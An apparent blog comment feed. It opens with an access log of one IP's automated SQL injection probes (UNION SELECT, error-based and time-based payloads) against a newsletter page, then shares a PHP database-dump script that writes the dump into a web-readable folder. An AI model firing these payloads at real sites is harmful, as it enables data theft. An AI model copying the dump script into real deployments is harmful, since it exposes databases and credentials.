/newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cdatabase%28%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29%20and%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%27%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%27%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20concat%28version%28%29%2C0x7233646D3076335F73716C5F696E6A656374696F6E%29%29%29-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29%20as%20nvarchar%284000%29%29%29%29-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:38 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28106%29%7C%7Cchr%28101%29%7C%7Cchr%2899%29%7C%7Cchr%28116%29%7C%7Cchr%28105%29%7C%7Cchr%28111%29%7C%7Cchr%28110%29%29-- HTTP/1.1" 200 284
Explanation of 0x31303235343830303536 can be found at Site has been hacked via SQL Injection.
In this case it seems we had just attempt to hack as id was not the right place to brute yourself in – there was a check for if (!intval($this->id)) and another parameter was required… but no prepare, just simple queries with slightly sanitized inputs.
Brrrr… must remove all non-cared-for code.
]]>And with RazorSQL?
Resulting SQL was pretty importable using PHPMyAdmin – with the exception of some blob fields that had been marked “not null” for no good reason in MS SQL… And need to import data first and then enforce costraints.
]]>So now, whenever I need to dump MySQL database produced by unfriendly application, I do it from command line and twice – as utf8 and latin1, deciding later whichever dump works better. And as it happens FTP access is much easier to get than SSH… and you can find config with SQL access pretty easily… I don’t even bother myself with anything else – I just upload humpty-dump.php, configure some access variables and hit it from the web side (well, I do take care to rename it before uploading and delete it afterwards, just in case you wonder about the security implications :-).
AND, as I sometimes need to grab also database dumps from WordPress installs with only FTP access (and unwilling to bother myself with installing a database-management plugin)… here comes humpty-dump.php:
<?php // dump database - either using WordPress config from same directory or locally configured parameters // v 1.2 (2012-11-25) Peeter Marvet, http://tehnokratt.net if ( is_file( dirname( __FILE__ ) . '/wp-config.php' ) ) { include( dirname( __FILE__ ) . '/wp-config.php' ); } else { define('DB_NAME', 'name'); define('DB_USER', 'user'); define('DB_PASSWORD', 'pass'); define('DB_HOST', 'localhost'); define('DB_CHARSET', 'utf8'); // NB! use latin1 on legacy systems that tend to produce unreadable dumps from phpmyadmin! } $backupFile = DB_NAME . "_" .date("Y-m-d-H-i-s"); $command = "mysqldump --opt "; if ( defined ('DB_CHARSET') ) { $command .= "--default-character-set=" . DB_CHARSET . " "; $backupFile .= "_" . DB_CHARSET; } $backupFile .= '.gz'; $command .= "--host=" . DB_HOST . " --user=" . DB_USER . " --password=" . DB_PASSWORD . " " . DB_NAME . " | gzip > $backupFile"; echo "Dumping <strong>" . DB_NAME . "</strong> on <strong>" . DB_HOST . "</strong>... "; echo system($command); echo 'Done! Grab it before it rots: <a href="http://' . $_SERVER['SERVER_NAME'] . '/' . $backupFile . '">' . $backupFile . '</a>'; ?>]]>